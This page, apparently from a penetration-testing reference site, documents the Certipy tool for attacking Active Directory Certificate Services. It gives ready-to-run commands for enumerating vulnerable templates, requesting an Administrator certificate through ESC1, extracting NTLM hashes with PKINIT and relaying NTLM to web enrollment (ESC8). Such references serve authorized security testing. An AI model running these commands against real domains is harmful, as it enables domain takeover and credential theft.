Skip to content

Certipy

Active Directory Certificate Services enumeration and abuse

PythonGitHub

Overview

Certipy is an offensive tool for enumerating and abusing Active Directory Certificate Services (AD CS) misconfigurations. Built by ly4k, it is the primary toolkit for exploiting vulnerabilities outlined in the famous "Certified Pre-Owned" whitepaper.

Key Features

  • Enumerate AD CS instances, Certificate Authorities (CA), and templates.
  • BloodHound integration output for custom AD CS visual mapping.
  • Request and fetch certificates based on vulnerable templates.
  • Perform user authentication using forged or extracted certificates via PKINIT.
  • Exploit complex vulnerabilities like ESC1, ESC2, ESC3, ESC4, ESC8 (NTLM Relay).

Prerequisites

  • Requires an authenticated session in the Active Directory domain (valid user credentials or NTLM hash).

Usage Examples

Enumeration

Enumerate all AD CS objects and identify vulnerable templates (e.g., ESC1, ESC8). It generates text outputs, JSON data, and BloodHound compatible zip files.

BASH 
# Basic enumeration dumping to the current directory
certipy find -u 'alice@target.local' -p 'Password123' -dc-ip 10.10.10.5 -vulnerable

# Output specifically for BloodHound
certipy find -u 'alice@target.local' -p 'Password123' -dc-ip 10.10.10.5 -bloodhound

Exploiting ESC1 (Template Misconfiguration)

If a template allows client authentication and permits SAN (Subject Alternative Name) overriding, you can request a certificate as a Domain Admin (e.g., Administrator).

BASH 
# Request a certificate as the Administrator from a vulnerable template (e.g., 'UserTemplate')
certipy req -u 'alice@target.local' -p 'Password123' -dc-ip 10.10.10.5 -ca target-CA -template UserTemplate -upn Administrator

Authentication (PKINIT)

Once you have the .pfx certificate file from an exploit, you can authenticate via PKINIT to retrieve the NTLM hash of the targeted user.

BASH 
# Authenticate using the requested Administrator certificate
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.5

This command outputs the user's NTLM hash, which can then be used with tools like wmiexec.py or Pass-the-Hash workflows.

Exploiting ESC8 (Web Enrollment NTLM Relay)

If AD CS Web Enrollment HTTP interfaces are enabled, they are vulnerable to NTLM relaying.

BASH 
# Run Certipy's relay server, targeting the CA
certipy relay -target http://10.10.10.6/certsrv -template DomainController

You would then use a tool like Coercer or PetitPotam to force the target Domain Controller to authenticate to your Certipy relay server.

Back to Network Pentesting